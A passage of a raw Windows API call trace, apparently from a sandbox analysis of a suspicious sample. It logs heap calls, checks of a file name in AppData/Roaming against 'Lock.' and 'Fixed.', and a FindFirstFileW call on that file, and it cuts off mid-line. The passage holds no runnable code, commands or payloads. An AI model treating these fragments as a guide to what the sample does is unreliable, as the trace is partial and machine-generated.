0x24b1728 [0206.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0206.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0206.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0206.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0206.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0206.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0206.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0206.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0206.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qtQYu5s9c3vFJHOzQ.csv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0206.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tQYu5s9c3vFJHOzQ.csv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0206.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QYu5s9c3vFJHOzQ.csv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0206.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Yu5s9c3vFJHOzQ.csv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0206.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="u5s9c3vFJHOzQ.csv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0206.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5s9c3vFJHOzQ.csv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s9c3vFJHOzQ.csv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0206.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9c3vFJHOzQ.csv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c3vFJHOzQ.csv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3vFJHOzQ.csv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vFJHOzQ.csv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0206.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FJHOzQ.csv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JHOzQ.csv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HOzQ.csv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OzQ.csv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0206.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zQ.csv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0206.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Q.csv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0206.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0206.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0206.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0206.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0206.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0206.412] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0206.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0206.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0206.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0206.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0206.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0206.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qtQYu5s9c3vFJHOzQ.csv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tQYu5s9c3vFJHOzQ.csv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QYu5s9c3vFJHOzQ.csv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Yu5s9c3vFJHOzQ.csv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="u5s9c3vFJHOzQ.csv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5s9c3vFJHOzQ.csv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0206.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s9c3vFJHOzQ.csv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9c3vFJHOzQ.csv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0206.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c3vFJHOzQ.csv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0206.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3vFJHOzQ.csv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0206.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vFJHOzQ.csv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FJHOzQ.csv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JHOzQ.csv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HOzQ.csv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OzQ.csv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zQ.csv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.413] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0206.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0206.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0206.414] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0206.414] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0206.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0206.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0206.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e28 [0206.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0206.414] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0206.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0206.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0206.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9420 [0206.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0206.414] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0206.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0206.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0206.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0206.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0206.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0206.415] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0206.415] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.415] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0206.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0206.415] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0206.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0206.415] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0206.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0206.415] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0206.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0206.415] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/qtQYu5s9c3vFJHOzQ.csv", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1d1a4a40, ftCreationTime.dwHighDateTime=0x1d4d06a, ftLastAccessTime.dwLowDateTime=0xc07d4420, ftLastAccessTime.dwHighDateTime=0x1d4d06b, ftLastWriteTime.dwLowDateTime=0xc07d4420, ftLastWriteTime.dwHighDateTime=0x1d4d06b, nFileSizeHigh=0x0, nFileSizeLow=0x7e14, dwReserved0=0xa820039, dwReserved1=0x19ac8, cFileName="qtQYu5s9c3vFJHOzQ.csv", cAlternateFileName="QTQYU5~1.CSV")) returned 0xaa5860 [0206.415] FindClose (in: hFindFile=0xaa5860 | out: hFindFile=0xaa5860) returned 1 [0206.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0206.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0206.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0206.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0206.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0206.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0206.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0206.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0206.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0206.416] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0206.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0206.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0206.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0206.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0206.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0206.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0206.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0206.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0206.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0206.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0206.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0206.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0206.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0206.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0206.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0206.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0206.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0206.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0206.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0206.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0206.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0206.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0206.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0206.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0206.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0206.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0206.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0206.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0206.418] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0206.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0206.418] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0206.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0206.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0206.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9dc8 [0206.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0206.418] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0206.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0206.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0206.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0206.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0206.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0206.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0206.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0206.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0206.419] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0206.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0206.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0206.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0206.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0206.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0206.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0206.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0206.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0206.419] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0206.420] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0206.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0206.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0206.420] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0206.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0206.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0206.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e40 [0206.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0206.420] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0206.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0206.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0206.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0206.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0206.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0206.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0206.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0206.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0206.421] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0206.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0206.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0206.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0206.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0206.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0206.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0206.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0206.422] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0206.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0206.422] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0206.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0206.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0206.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0206.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0206.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0206.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0206.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0206.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0206.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0206.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0206.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0206.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0206.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0206.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0206.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0206.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0206.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0206.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0206.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0206.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0206.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0206.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0206.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0206.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0206.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: 